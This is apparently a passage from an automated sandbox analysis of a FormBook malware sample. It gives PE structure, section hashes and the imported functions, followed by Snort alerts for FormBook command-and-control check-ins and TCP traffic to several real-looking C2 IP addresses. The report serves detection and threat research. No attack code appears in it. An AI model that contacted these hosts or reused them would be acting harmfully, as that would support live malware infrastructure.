                                                    IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                    IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                    IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                    IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x474400x140.rdata
                                                    IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                    IMAGE_DIRECTORY_ENTRY_IAT0x3c0000x2b8.rdata
                                                    IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                    IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                    IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                    Sections

                                                    NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                    .text0x10000x3a6480x3a800ae79005d0d0fe176d53e781e1de1ba8bFalse0.477672609508547data6.276966423924579IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                    .rdata0x3c0000x104320x10600c72f5d85e22764ad342862f4abc84204False0.4201306059160305data4.882588498752784IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                    .data0x4d0000x173440x15c00a5e6c6566cb836c90c4e7d663abe1255False0.37567349137931033Matlab v4 mat-file (little endian) i, sparse, rows 57, columns 98, imaginary2.842031074961108IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                    .pdata0x650000x31f80x32001e318cfae4f5a3e57b915ec4ed79f33dFalse0.476953125data5.5240758223981326IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                    _RDATA0x690000x1f40x200ada42deae2bad26d862984b105b86738False0.505859375data4.191034655991663IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                    .reloc0x6a0000x9f00xa005835deba7f19304c1a5e65eb7496ff47False0.511328125data5.426763089037067IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                                    Imports

                                                    DLLImport
                                                    KERNEL32.dllGetLastError, GetModuleHandleA, GetProcAddress, WideCharToMultiByte, EnterCriticalSection, LeaveCriticalSection, InitializeCriticalSectionEx, DeleteCriticalSection, EncodePointer, DecodePointer, MultiByteToWideChar, LCMapStringEx, GetStringTypeW, GetCPInfo, RtlCaptureContext, RtlLookupFunctionEntry, RtlVirtualUnwind, IsDebuggerPresent, UnhandledExceptionFilter, SetUnhandledExceptionFilter, GetStartupInfoW, IsProcessorFeaturePresent, GetModuleHandleW, GetCurrentProcess, TerminateProcess, QueryPerformanceCounter, GetCurrentProcessId, GetCurrentThreadId, GetSystemTimeAsFileTime, InitializeSListHead, SetEndOfFile, RtlPcToFileHeader, RaiseException, RtlUnwindEx, SetLastError, InitializeCriticalSectionAndSpinCount, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, FreeLibrary, LoadLibraryExW, ExitProcess, GetModuleHandleExW, GetModuleFileNameW, GetStdHandle, WriteFile, GetCommandLineA, GetCommandLineW, HeapAlloc, HeapFree, FlsAlloc, FlsGetValue, FlsSetValue, FlsFree, CompareStringW, LCMapStringW, GetLocaleInfoW, IsValidLocale, GetUserDefaultLCID, EnumSystemLocalesW, GetFileType, CloseHandle, FlushFileBuffers, GetConsoleOutputCP, GetConsoleMode, ReadFile, GetFileSizeEx, SetFilePointerEx, ReadConsoleW, HeapReAlloc, FindClose, FindFirstFileExW, FindNextFileW, IsValidCodePage, GetACP, GetOEMCP, GetEnvironmentStringsW, FreeEnvironmentStringsW, SetEnvironmentVariableW, GetProcessHeap, SetStdHandle, CreateFileW, HeapSize, WriteConsoleW, RtlUnwind

                                                    Network Behavior

                                                    Snort IDS Alerts

                                                    TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                                                    05/16/24-17:19:27.047625TCP2855465ETPRO TROJAN FormBook CnC Checkin (GET) M24972280192.168.2.957.151.38.169
                                                    05/16/24-17:21:43.322537TCP2855464ETPRO TROJAN FormBook CnC Checkin (POST) M34974780192.168.2.9199.59.243.225
                                                    05/16/24-17:19:56.497938TCP2855465ETPRO TROJAN FormBook CnC Checkin (GET) M24973080192.168.2.9217.160.0.111
                                                    05/16/24-17:20:28.696791TCP2855464ETPRO TROJAN FormBook CnC Checkin (POST) M34973680192.168.2.9162.0.237.22
                                                    05/16/24-17:21:12.951995TCP2855465ETPRO TROJAN FormBook CnC Checkin (GET) M24974280192.168.2.9103.168.172.37
                                                    05/16/24-17:19:19.363164TCP2855464ETPRO TROJAN FormBook CnC Checkin (POST) M34971980192.168.2.957.151.38.169
                                                    05/16/24-17:21:22.633918TCP2855464ETPRO TROJAN FormBook CnC Checkin (POST) M34974480192.168.2.9104.37.39.71
                                                    05/16/24-17:18:46.331711TCP2855465ETPRO TROJAN FormBook CnC Checkin (GET) M24971380192.168.2.93.33.130.190
                                                    05/16/24-17:19:21.898890TCP2855464ETPRO TROJAN FormBook CnC Checkin (POST) M34972080192.168.2.957.151.38.169
                                                    05/16/24-17:20:03.048420TCP2855464ETPRO TROJAN FormBook CnC Checkin (POST) M34973180192.168.2.991.195.240.123
                                                    05/16/24-17:19:51.432033TCP2855464ETPRO TROJAN FormBook CnC Checkin (POST) M34972880192.168.2.9217.160.0.111
                                                    05/16/24-17:19:06.306804TCP2855464ETPRO TROJAN FormBook CnC Checkin (POST) M34971680192.168.2.9162.241.216.140
                                                    05/16/24-17:21:04.300154TCP2855464ETPRO TROJAN FormBook CnC Checkin (POST) M34973980192.168.2.9103.168.172.37
                                                    05/16/24-17:20:10.669912TCP2855465ETPRO TROJAN FormBook CnC Checkin (GET) M24973480192.168.2.991.195.240.123
                                                    05/16/24-17:21:51.276734TCP2855465ETPRO TROJAN FormBook CnC Checkin (GET) M24975080192.168.2.9199.59.243.225
                                                    05/16/24-17:20:26.161324TCP2855464ETPRO TROJAN FormBook CnC Checkin (POST) M34973580192.168.2.9162.0.237.22
                                                    05/16/24-17:21:06.836740TCP2855464ETPRO TROJAN FormBook CnC Checkin (POST) M34974080192.168.2.9103.168.172.37
                                                    05/16/24-17:19:34.590843TCP2855464ETPRO TROJAN FormBook CnC Checkin (POST) M34972380192.168.2.9162.241.216.140
                                                    05/16/24-17:21:27.714376TCP2855465ETPRO TROJAN FormBook CnC Checkin (GET) M24974680192.168.2.9104.37.39.71
                                                    05/16/24-17:20:33.776360TCP2855465ETPRO TROJAN FormBook CnC Checkin (GET) M24973880192.168.2.9162.0.237.22
                                                    05/16/24-17:19:03.768347TCP2856318ETPRO TROJAN FormBook CnC Checkin (POST) M44971480192.168.2.9162.241.216.140
                                                    05/16/24-17:19:42.203635TCP2855465ETPRO TROJAN FormBook CnC Checkin (GET) M24972680192.168.2.9162.241.216.140
                                                    05/16/24-17:21:20.106505TCP2855464ETPRO TROJAN FormBook CnC Checkin (POST) M34974380192.168.2.9104.37.39.71
                                                    05/16/24-17:19:03.768347TCP2855464ETPRO TROJAN FormBook CnC Checkin (POST) M34971480192.168.2.9162.241.216.140
                                                    05/16/24-17:20:05.587966TCP2855464ETPRO TROJAN FormBook CnC Checkin (POST) M34973280192.168.2.991.195.240.123
                                                    05/16/24-17:21:45.851510TCP2855464ETPRO TROJAN FormBook CnC Checkin (POST) M34974880192.168.2.9199.59.243.225
                                                    05/16/24-17:19:11.367879TCP2855465ETPRO TROJAN FormBook CnC Checkin (GET) M24971880192.168.2.9162.241.216.140
                                                    05/16/24-17:19:37.117289TCP2855464ETPRO TROJAN FormBook CnC Checkin (POST) M34972480192.168.2.9162.241.216.140
                                                    05/16/24-17:19:48.469305TCP2855464ETPRO TROJAN FormBook CnC Checkin (POST) M34972780192.168.2.9217.160.0.111

                                                    Network Port Distribution

                                                    TCP Packets

                                                    TimestampSource PortDest PortSource IPDest IP
                                                    May 16, 2024 17:18:46.324276924 CEST4971380192.168.2.93.33.130.190
                                                    May 16, 2024 17:18:46.329226971 CEST80497133.33.130.190192.168.2.9
                                                    May 16, 2024 17:18:46.329325914 CEST4971380192.168.2.93.33.130.190
                                                    May 16, 2024 17:18:46.331711054 CEST4971380192.168.2.93.33.130.190
                                                    May 16, 2024 17:18:46.380167007 CEST80497133.33.130.190192.168.2.9
                                                    May 16, 2024 17:18:48.392440081 CEST80497133.33.130.190192.168.2.9
                                                    May 16, 2024 17:18:48.435635090 CEST4971380192.168.2.93.33.130.190
                                                    May 16, 2024 17:18:48.696089983 CEST80497133.33.130.190192.168.2.9
                                                    May 16, 2024 17:18:48.696387053 CEST4971380192.168.2.93.33.130.190
                                                    May 16, 2024 17:18:48.697690010 CEST4971380192.168.2.93.33.130.190
                                                    May 16, 2024 17:18:48.751924038 CEST80497133.33.130.190192.168.2.9
                                                    May 16, 2024 17:19:03.761560917 CEST4971480192.168.2.9162.241.216.140
                                                    May 16, 2024 17:19:03.766444921 CEST8049714162.241.216.140192.168.2.9
                                                    May 16, 2024 17:19:03.766522884 CEST4971480192.168.2.9162.241.216.140
                                                    May 16, 2024 17:19:03.768347025 CEST4971480192.168.2.9162.241.216.140
                                                    May 16, 2024 17:19:03.819943905 CEST8049714162.241.216.140192.168.2.9
                                                    May 16, 2024 17:19:05.125972033 CEST8049714162.241.216.140192.168.2.9
                                                    May 16, 2024 17:19:05.170070887 CEST4971480192.168.2.9162.241.216.140
                                                    May 16, 2024 17:19:05.279503107 CEST4971480192.168.2.9162.241.216.140
                                                    May 16, 2024 17:19:06.299604893 CEST4971680192.168.2.9162.241.216.140
                                                    May 16, 2024 17:19:06.304570913 CEST8049716162.241.216.140192.168.2.9
                                                    May 16, 2024 17:19:06.304650068 CEST4971680192.168.2.9162.241.216.140
                                                    May 16, 2024 17:19:06.306803942 CEST4971680192.168.2.9162.241.216.140
                                                    May 16, 2024 17:19:06.356061935 CEST8049716162.241.216.140192.168.2.9
                                                    May 16, 2024 17:19:07.694478989 CEST8049716162.241.216.140192.168.2.9
                                                    May 16, 2024 17:19:07.694504976 CEST8049716162.241.216.140192.168.2.9
                                                    May 16, 2024 17:19:07.694731951 CEST4971680192.168.2.9162.241.216.140
                                                    May 16, 2024 17:19:07.810813904 CEST4971680192.168.2.9162.241.216.140
                                                    May 16, 2024 17:19:08.829400063 CEST4971780192.168.2.9162.241.216.140
                                                    May 16, 2024 17:19:08.834475040 CEST8049717162.241.216.140192.168.2.9
                                                    May 16, 2024 17:19:08.834553003 CEST4971780192.168.2.9162.241.216.140
                                                    May 16, 2024 17:19:08.836431980 CEST4971780192.168.2.9162.241.216.140
                                                    May 16, 2024 17:19:08.843250990 CEST8049717162.241.216.140192.168.2.9
                                                    May 16, 2024 17:19:08.894784927 CEST8049717162.241.216.140192.168.2.9
                                                    May 16, 2024 17:19:09.538666964 CEST8049717162.241.216.140192.168.2.9
                                                    May 16, 2024 17:19:09.591913939 CEST4971780192.168.2.9162.241.216.140
                                                    May 16, 2024 17:19:09.848310947 CEST8049717162.241.216.140192.168.2.9
                                                    May 16, 2024 17:19:09.848371983 CEST4971780192.168.2.9162.241.216.140
                                                    May 16, 2024 17:19:10.342015028 CEST4971780192.168.2.9162.241.216.140
                                                    May 16, 2024 17:19:11.361006975 CEST4971880192.168.2.9162.241.216.140
                                                    May 16, 2024 17:19:11.366080046 CEST8049718162.241.216.140192.168.2.9
                                                    May 16, 2024 17:19:11.366169930 CEST4971880192.168.2.9162.241.216.140
                                                    May 16, 2024 17:19:11.367878914 CEST4971880192.168.2.9162.241.216.140
                                                    May 16, 2024 17:19:11.416141033 CEST8049718162.241.216.140192.168.2.9
                                                    May 16, 2024 17:19:12.440829039 CEST8049718162.241.216.140192.168.2.9
                                                    May 16, 2024 17:19:12.482573986 CEST4971880192.168.2.9162.241.216.140
                                                    May 16, 2024 17:19:12.733263969 CEST8049718162.241.216.140192.168.2.9
                                                    May 16, 2024 17:19:12.733428001 CEST4971880192.168.2.9162.241.216.140
                                                    May 16, 2024 17:19:14.233988047 CEST4971880192.168.2.9162.241.216.140
                                                    May 16, 2024 17:19:14.239041090 CEST8049718162.241.216.140192.168.2.9
                                                    May 16, 2024 17:19:19.353404045 CEST4971980192.168.2.957.151.38.169
                                                    May 16, 2024 17:19:19.358443975 CEST804971957.151.38.169192.168.2.9
                                                    May 16, 2024 17:19:19.358586073 CEST4971980192.168.2.957.151.38.169
                                                    May 16, 2024 17:19:19.363163948 CEST4971980192.168.2.957.151.38.169
                                                    May 16, 2024 17:19:19.412175894 CEST804971957.151.38.169192.168.2.9
                                                    May 16, 2024 17:19:20.155518055 CEST804971957.151.38.169192.168.2.9
                                                    May 16, 2024 17:19:20.201375961 CEST4971980192.168.2.957.151.38.169
                                                    May 16, 2024 17:19:20.474569082 CEST804971957.151.38.169192.168.2.9
                                                    May 16, 2024 17:19:20.474647045 CEST4971980192.168.2.957.151.38.169
                                                    May 16, 2024 17:19:20.873369932 CEST4971980192.168.2.957.151.38.169
                                                    May 16, 2024 17:19:21.891849041 CEST4972080192.168.2.957.151.38.169
                                                    May 16, 2024 17:19:21.896855116 CEST804972057.151.38.169192.168.2.9
                                                    May 16, 2024 17:19:21.896995068 CEST4972080192.168.2.957.151.38.169
                                                    May 16, 2024 17:19:21.898890018 CEST4972080192.168.2.957.151.38.169
                                                    May 16, 2024 17:19:21.948046923 CEST804972057.151.38.169192.168.2.9
                                                    May 16, 2024 17:19:23.406748056 CEST4972080192.168.2.957.151.38.169
                                                    May 16, 2024 17:19:23.435662985 CEST804972057.151.38.169192.168.2.9
                                                    May 16, 2024 17:19:23.435767889 CEST4972080192.168.2.957.151.38.169
                                                    May 16, 2024 17:19:24.479079962 CEST4972180192.168.2.957.151.38.169
                                                    May 16, 2024 17:19:24.484056950 CEST804972157.151.38.169192.168.2.9
                                                    May 16, 2024 17:19:24.484157085 CEST4972180192.168.2.957.151.38.169
                                                    May 16, 2024 17:19:24.486053944 CEST4972180192.168.2.957.151.38.169
                                                    May 16, 2024 17:19:24.490938902 CEST804972157.151.38.169192.168.2.9
                                                    May 16, 2024 17:19:24.552165031 CEST804972157.151.38.169192.168.2.9
                                                    May 16, 2024 17:19:25.999231100 CEST4972180192.168.2.957.151.38.169
                                                    May 16, 2024 17:19:26.005398989 CEST804972157.151.38.169192.168.2.9
                                                    May 16, 2024 17:19:26.005453110 CEST4972180192.168.2.957.151.38.169
                                                    May 16, 2024 17:19:27.017941952 CEST4972280192.168.2.957.151.38.169
                                                    May 16, 2024 17:19:27.023000956 CEST804972257.151.38.169192.168.2.9
                                                    May 16, 2024 17:19:27.023128986 CEST4972280192.168.2.957.151.38.169
                                                    May 16, 2024 17:19:27.047625065 CEST4972280192.168.2.957.151.38.169
                                                    May 16, 2024 17:19:27.075915098 CEST804972257.151.38.169192.168.2.9
                                                    May 16, 2024 17:19:29.256321907 CEST804972257.151.38.169192.168.2.9
                                                    May 16, 2024 17:19:29.310789108 CEST4972280192.168.2.957.151.38.169
                                                    May 16, 2024 17:19:29.562824965 CEST804972257.151.38.169192.168.2.9
                                                    May 16, 2024 17:19:29.562972069 CEST4972280192.168.2.957.151.38.169
                                                    May 16, 2024 17:19:29.569169998 CEST4972280192.168.2.957.151.38.169
                                                    May 16, 2024 17:19:29.574296951 CEST804972257.151.38.169192.168.2.9
                                                    May 16, 2024 17:19:34.582067013 CEST4972380192.168.2.9162.241.216.140
                                                    May 16, 2024 17:19:34.588835955 CEST8049723162.241.216.140192.168.2.9
                                                    May 16, 2024 17:19:34.588938951 CEST4972380192.168.2.9162.241.216.140
                                                    May 16, 2024 17:19:34.590842962 CEST4972380192.168.2.9162.241.216.140
                                                    May 16, 2024 17:19:34.644843102 CEST8049723162.241.216.140192.168.2.9
                                                    May 16, 2024 17:19:35.267997980 CEST8049723162.241.216.140192.168.2.9
                                                    May 16, 2024 17:19:35.274241924 CEST8049723162.241.216.140192.168.2.9
                                                    May 16, 2024 17:19:35.274334908 CEST4972380192.168.2.9162.241.216.140
                                                    May 16, 2024 17:19:36.092104912 CEST4972380192.168.2.9162.241.216.140
                                                    May 16, 2024 17:19:37.110362053 CEST4972480192.168.2.9162.241.216.140
                                                    May 16, 2024 17:19:37.115406036 CEST8049724162.241.216.140192.168.2.9
                                                    May 16, 2024 17:19:37.115516901 CEST4972480192.168.2.9162.241.216.140
                                                    May 16, 2024 17:19:37.117289066 CEST4972480192.168.2.9162.241.216.140
                                                    May 16, 2024 17:19:37.167917013 CEST8049724162.241.216.140192.168.2.9
                                                    May 16, 2024 17:19:38.623622894 CEST4972480192.168.2.9162.241.216.140
                                                    May 16, 2024 17:19:38.628971100 CEST8049724162.241.216.140192.168.2.9
                                                    May 16, 2024 17:19:38.629070044 CEST4972480192.168.2.9162.241.216.140
                                                    May 16, 2024 17:19:39.648003101 CEST4972580192.168.2.9162.241.216.140
                                                    May 16, 2024 17:19:39.652972937 CEST8049725162.241.216.140192.168.2.9
                                                    May 16, 2024 17:19:39.653114080 CEST4972580192.168.2.9162.241.216.140
                                                    May 16, 2024 17:19:39.655404091 CEST4972580192.168.2.9162.241.216.140
                                                    May 16, 2024 17:19:39.660303116 CEST8049725162.241.216.140192.168.2.9
                                                    May 16, 2024 17:19:39.712876081 CEST8049725162.241.216.140192.168.2.9
                                                    May 16, 2024 17:19:40.897634983 CEST8049725162.241.216.140192.168.2.9
                                                    May 16, 2024 17:19:40.951421022 CEST4972580192.168.2.9162.241.216.140
                                                    May 16, 2024 17:19:41.170176983 CEST4972580192.168.2.9162.241.216.140
                                                    May 16, 2024 17:19:42.188783884 CEST4972680192.168.2.9162.241.216.140
                                                    May 16, 2024 17:19:42.201668024 CEST8049726162.241.216.140192.168.2.9
                                                    May 16, 2024 17:19:42.201762915 CEST4972680192.168.2.9162.241.216.140
                                                    May 16, 2024 17:19:42.203634977 CEST4972680192.168.2.9162.241.216.140
                                                    May 16, 2024 17:19:42.251948118 CEST8049726162.241.216.140192.168.2.9
                                                    May 16, 2024 17:19:43.052234888 CEST8049726162.241.216.140192.168.2.9
                                                    May 16, 2024 17:19:43.107605934 CEST4972680192.168.2.9162.241.216.140
                                                    May 16, 2024 17:19:43.354980946 CEST8049726162.241.216.140192.168.2.9
                                                    May 16, 2024 17:19:43.355142117 CEST4972680192.168.2.9162.241.216.140
                                                    May 16, 2024 17:19:43.356067896 CEST4972680192.168.2.9162.241.216.140
                                                    May 16, 2024 17:19:43.365406036 CEST8049726162.241.216.140192.168.2.9
                                                    May 16, 2024 17:19:48.462255955 CEST4972780192.168.2.9217.160.0.111
                                                    May 16, 2024 17:19:48.467331886 CEST8049727217.160.0.111192.168.2.9
                                                    May 16, 2024 17:19:48.467427969 CEST4972780192.168.2.9217.160.0.111
                                                    May 16, 2024 17:19:48.469305038 CEST4972780192.168.2.9217.160.0.111
                                                    May 16, 2024 17:19:48.524044037 CEST8049727217.160.0.111192.168.2.9
                                                    May 16, 2024 17:19:49.188283920 CEST8049727217.160.0.111192.168.2.9
                                                    May 16, 2024 17:19:49.194152117 CEST8049727217.160.0.111192.168.2.9
                                                    May 16, 2024 17:19:49.194257021 CEST4972780192.168.2.9217.160.0.111
                                                    May 16, 2024 17:19:49.203298092 CEST8049727217.160.0.111192.168.2.9
                                                    May 16, 2024 17:19:49.248214006 CEST4972780192.168.2.9217.160.0.111
                                                    May 16, 2024 17:19:49.596793890 CEST8049727217.160.0.111192.168.2.9
                                                    May 16, 2024 17:19:49.596872091 CEST4972780192.168.2.9217.160.0.111
                                                    May 16, 2024 17:19:50.412527084 CEST4972780192.168.2.9217.160.0.111
                                                    May 16, 2024 17:19:51.424556017 CEST4972880192.168.2.9217.160.0.111
                                                    May 16, 2024 17:19:51.429676056 CEST8049728217.160.0.111192.168.2.9
                                                    May 16, 2024 17:19:51.429749966 CEST4972880192.168.2.9217.160.0.111
                                                    May 16, 2024 17:19:51.432033062 CEST4972880192.168.2.9217.160.0.111
                                                    May 16, 2024 17:19:51.483916998 CEST8049728217.160.0.111192.168.2.9
                                                    May 16, 2024 17:19:52.113498926 CEST8049728217.160.0.111192.168.2.9
                                                    May 16, 2024 17:19:52.118772984 CEST8049728217.160.0.111192.168.2.9
                                                    May 16, 2024 17:19:52.118868113 CEST4972880192.168.2.9217.160.0.111
                                                    May 16, 2024 17:19:52.132638931 CEST8049728217.160.0.111192.168.2.9
                                                    May 16, 2024 17:19:52.188060999 CEST8049728217.160.0.111192.168.2.9
                                                    May 16, 2024 17:19:52.188090086 CEST8049728217.160.0.111192.168.2.9
                                                    May 16, 2024 17:19:52.188169003 CEST4972880192.168.2.9217.160.0.111
                                                    May 16, 2024 17:19:52.935866117 CEST4972880192.168.2.9217.160.0.111
                                                    May 16, 2024 17:19:53.954507113 CEST4972980192.168.2.9217.160.0.111
                                                    May 16, 2024 17:19:53.959471941 CEST8049729217.160.0.111192.168.2.9
                                                    May 16, 2024 17:19:53.962147951 CEST4972980192.168.2.9217.160.0.111
                                                    May 16, 2024 17:19:53.965930939 CEST4972980192.168.2.9217.160.0.111
                                                    May 16, 2024 17:19:53.971760035 CEST8049729217.160.0.111192.168.2.9
                                                    May 16, 2024 17:19:54.017270088 CEST8049729217.160.0.111192.168.2.9
                                                    May 16, 2024 17:19:55.467086077 CEST4972980192.168.2.9217.160.0.111
                                                    May 16, 2024 17:19:55.515187979 CEST8049729217.160.0.111192.168.2.9
                                                    May 16, 2024 17:19:56.269515038 CEST8049729217.160.0.111192.168.2.9
                                                    May 16, 2024 17:19:56.270112038 CEST4972980192.168.2.9217.160.0.111
                                                    May 16, 2024 17:19:56.485933065 CEST4973080192.168.2.9217.160.0.111
                                                    May 16, 2024 17:19:56.491080999 CEST8049730217.160.0.111192.168.2.9
                                                    May 16, 2024 17:19:56.492202044 CEST4973080192.168.2.9217.160.0.111
                                                    May 16, 2024 17:19:56.497937918 CEST4973080192.168.2.9217.160.0.111
                                                    May 16, 2024 17:19:56.543973923 CEST8049730217.160.0.111192.168.2.9
                                                    May 16, 2024 17:19:57.187951088 CEST8049730217.160.0.111192.168.2.9
                                                    May 16, 2024 17:19:57.190057039 CEST8049730217.160.0.111192.168.2.9
                                                    May 16, 2024 17:19:57.190145016 CEST4973080192.168.2.9217.160.0.111
                                                    May 16, 2024 17:19:57.194837093 CEST8049730217.160.0.111192.168.2.9
                                                    May 16, 2024 17:19:57.199682951 CEST8049730217.160.0.111192.168.2.9
                                                    May 16, 2024 17:19:57.199698925 CEST8049730217.160.0.111192.168.2.9
                                                    May 16, 2024 17:19:57.199845076 CEST4973080192.168.2.9217.160.0.111
                                                    May 16, 2024 17:19:57.199857950 CEST4973080192.168.2.9217.160.0.111
                                                    May 16, 2024 17:19:57.202431917 CEST4973080192.168.2.9217.160.0.111
                                                    May 16, 2024 17:19:57.210866928 CEST8049730217.160.0.111192.168.2.9
                                                    May 16, 2024 17:20:03.040365934 CEST4973180192.168.2.991.195.240.123
                                                    May 16, 2024 17:20:03.046504021 CEST804973191.195.240.123192.168.2.9
                                                    May 16, 2024 17:20:03.046612024 CEST4973180192.168.2.991.195.240.123
                                                    May 16, 2024 17:20:03.048419952 CEST4973180192.168.2.991.195.240.123
                                                    May 16, 2024 17:20:03.104073048 CEST804973191.195.240.123192.168.2.9
                                                    May 16, 2024 17:20:04.560791969 CEST4973180192.168.2.991.195.240.123
                                                    May 16, 2024 17:20:04.566714048 CEST804973191.195.240.123192.168.2.9
                                                    May 16, 2024 17:20:04.566812038 CEST4973180192.168.2.991.195.240.123
                                                    May 16, 2024 17:20:05.580542088 CEST4973280192.168.2.991.195.240.123
                                                    May 16, 2024 17:20:05.585521936 CEST804973291.195.240.123192.168.2.9
                                                    May 16, 2024 17:20:05.585597038 CEST4973280192.168.2.991.195.240.123
                                                    May 16, 2024 17:20:05.587965965 CEST4973280192.168.2.991.195.240.123
                                                    May 16, 2024 17:20:05.636416912 CEST804973291.195.240.123192.168.2.9
                                                    May 16, 2024 17:20:07.092062950 CEST4973280192.168.2.991.195.240.123
                                                    May 16, 2024 17:20:07.097603083 CEST804973291.195.240.123192.168.2.9
                                                    May 16, 2024 17:20:07.097702026 CEST4973280192.168.2.991.195.240.123
                                                    May 16, 2024 17:20:08.117937088 CEST4973380192.168.2.991.195.240.123
                                                    May 16, 2024 17:20:08.122992992 CEST804973391.195.240.123192.168.2.9
                                                    May 16, 2024 17:20:08.123151064 CEST4973380192.168.2.991.195.240.123
                                                    May 16, 2024 17:20:08.125835896 CEST4973380192.168.2.991.195.240.123
                                                    May 16, 2024 17:20:08.130723000 CEST804973391.195.240.123192.168.2.9
                                                    May 16, 2024 17:20:08.180879116 CEST804973391.195.240.123192.168.2.9
                                                    May 16, 2024 17:20:09.638972044 CEST4973380192.168.2.991.195.240.123
                                                    May 16, 2024 17:20:09.644553900 CEST804973391.195.240.123192.168.2.9
                                                    May 16, 2024 17:20:09.644615889 CEST4973380192.168.2.991.195.240.123
                                                    May 16, 2024 17:20:10.657918930 CEST4973480192.168.2.991.195.240.123
                                                    May 16, 2024 17:20:10.663022995 CEST804973491.195.240.123192.168.2.9
                                                    May 16, 2024 17:20:10.666063070 CEST4973480192.168.2.991.195.240.123
                                                    May 16, 2024 17:20:10.669912100 CEST4973480192.168.2.991.195.240.123
                                                    May 16, 2024 17:20:10.716489077 CEST804973491.195.240.123192.168.2.9
                                                    May 16, 2024 17:20:20.951997042 CEST804973491.195.240.123192.168.2.9
                                                    May 16, 2024 17:20:20.952133894 CEST4973480192.168.2.991.195.240.123
                                                    May 16, 2024 17:20:20.953697920 CEST4973480192.168.2.991.195.240.123
                                                    May 16, 2024 17:20:20.961786032 CEST804973491.195.240.123192.168.2.9
                                                    May 16, 2024 17:20:26.151983023 CEST4973580192.168.2.9162.0.237.22
                                                    May 16, 2024 17:20:26.159240961 CEST8049735162.0.237.22192.168.2.9
                                                    May 16, 2024 17:20:26.159312010 CEST4973580192.168.2.9162.0.237.22
                                                    May 16, 2024 17:20:26.161324024 CEST4973580192.168.2.9162.0.237.22
                                                    May 16, 2024 17:20:26.216933966 CEST8049735162.0.237.22192.168.2.9
                                                    May 16, 2024 17:20:27.671992064 CEST4973580192.168.2.9162.0.237.22
                                                    May 16, 2024 17:20:27.677457094 CEST8049735162.0.237.22192.168.2.9
                                                    May 16, 2024 17:20:27.680314064 CEST4973580192.168.2.9162.0.237.22
                                                    May 16, 2024 17:20:28.689534903 CEST4973680192.168.2.9162.0.237.22
                                                    May 16, 2024 17:20:28.694514990 CEST8049736162.0.237.22192.168.2.9
                                                    May 16, 2024 17:20:28.694590092 CEST4973680192.168.2.9162.0.237.22
                                                    May 16, 2024 17:20:28.696790934 CEST4973680192.168.2.9162.0.237.22
                                                    May 16, 2024 17:20:28.751858950 CEST8049736162.0.237.22192.168.2.9
                                                    May 16, 2024 17:20:30.030138969 CEST8049736162.0.237.22192.168.2.9
                                                    May 16, 2024 17:20:30.076365948 CEST4973680192.168.2.9162.0.237.22
                                                    May 16, 2024 17:20:30.201611042 CEST4973680192.168.2.9162.0.237.22
                                                    May 16, 2024 17:20:31.220105886 CEST4973780192.168.2.9162.0.237.22
                                                    May 16, 2024 17:20:31.227965117 CEST8049737162.0.237.22192.168.2.9
                                                    May 16, 2024 17:20:31.229998112 CEST4973780192.168.2.9162.0.237.22
                                                    May 16, 2024 17:20:31.231916904 CEST4973780192.168.2.9162.0.237.22
                                                    May 16, 2024 17:20:31.236784935 CEST8049737162.0.237.22192.168.2.9
                                                    May 16, 2024 17:20:31.288918972 CEST8049737162.0.237.22192.168.2.9
                                                    May 16, 2024 17:20:32.106977940 CEST8049737162.0.237.22192.168.2.9
                                                    May 16, 2024 17:20:32.111676931 CEST8049737162.0.237.22192.168.2.9
                                                    May 16, 2024 17:20:32.111726999 CEST4973780192.168.2.9162.0.237.22
                                                    May 16, 2024 17:20:32.749934912 CEST4973780192.168.2.9162.0.237.22
                                                    May 16, 2024 17:20:33.768908024 CEST4973880192.168.2.9162.0.237.22
                                                    May 16, 2024 17:20:33.773974895 CEST8049738162.0.237.22192.168.2.9
                                                    May 16, 2024 17:20:33.774056911 CEST4973880192.168.2.9162.0.237.22
                                                    May 16, 2024 17:20:33.776360035 CEST4973880192.168.2.9162.0.237.22
                                                    May 16, 2024 17:20:33.827877998 CEST8049738162.0.237.22192.168.2.9
                                                    May 16, 2024 17:20:34.576129913 CEST8049738162.0.237.22192.168.2.9
                                                    May 16, 2024 17:20:34.580806017 CEST8049738162.0.237.22192.168.2.9
                                                    May 16, 2024 17:20:34.580888987 CEST4973880192.168.2.9162.0.237.22
                                                    May 16, 2024 17:20:34.581933022 CEST4973880192.168.2.9162.0.237.22
                                                    May 16, 2024 17:20:34.631911993 CEST8049738162.0.237.22192.168.2.9
                                                    May 16, 2024 17:21:04.293111086 CEST4973980192.168.2.9103.168.172.37
                                                    May 16, 2024 17:21:04.298228025 CEST8049739103.168.172.37192.168.2.9
                                                    May 16, 2024 17:21:04.298343897 CEST4973980192.168.2.9103.168.172.37
                                                    May 16, 2024 17:21:04.300153971 CEST4973980192.168.2.9103.168.172.37
                                                    May 16, 2024 17:21:04.351963043 CEST8049739103.168.172.37192.168.2.9
                                                    May 16, 2024 17:21:05.327138901 CEST8049739103.168.172.37192.168.2.9
                                                    May 16, 2024 17:21:05.373919010 CEST4973980192.168.2.9103.168.172.37
                                                    May 16, 2024 17:21:05.628823996 CEST8049739103.168.172.37192.168.2.9
                                                    May 16, 2024 17:21:05.628889084 CEST4973980192.168.2.9103.168.172.37
                                                    May 16, 2024 17:21:05.810842037 CEST4973980192.168.2.9103.168.172.37
                                                    May 16, 2024 17:21:06.829600096 CEST4974080192.168.2.9103.168.172.37
